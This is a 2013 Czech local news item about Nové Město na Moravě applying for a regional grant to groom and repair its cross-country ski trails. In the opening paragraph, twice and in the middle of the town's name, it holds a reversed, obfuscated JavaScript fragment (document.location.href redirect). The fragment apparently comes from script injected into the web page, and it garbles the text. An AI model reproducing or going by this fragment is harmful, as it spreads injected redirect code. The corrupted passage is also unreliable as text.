Nové Město na Moravě, aktuality lyžařské tratě, dotace, úprava
Rainbow page separator

Novoměstští požádali o dotaci na úpravu lyžařských tratí

Středa, 7. srpna 2013

lyzarsky-okruhNové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / O dotaci z Fondu Vysočiny na úpravu lyžařských běžeckých tratí v regionu požádali v Novém Městě na Moravě. Jedná se o maximální výši dotace, tedy o dvě stě tisíc korun, při padesátiprocentní spoluúčasti žadatele o grant. Celkem by tak novoměstské lyžařské tratě mohlo v příští zimní sezoně podpořit čtyři sta tisíc korun.

Pokud budou Novoměstští se svojí žádostí úspěšní, získané finance půjdou nejenom do běžné údržby tratí, konkrétně na jejich najíždění a následnou úpravu, ale i do již potřebných větších oprav. Například do rekonstrukce přejezdových můstků pro rolbu u Třech Studní a u Kuklíku.
Finanční prostředky z grantu by rovněž měly být použity na údržbu směrovek, doplnění informačních tabulek a jejich pevnější ukotvení.
Není ovšem vyloučeno, že lyžařská sezona si vyžádá ještě více finančních prostředků. V případě, že se zima vydaří, Mikroregion Novoměstsko počítá s navýšením rozpočtu o dalších 150 tisíc korun.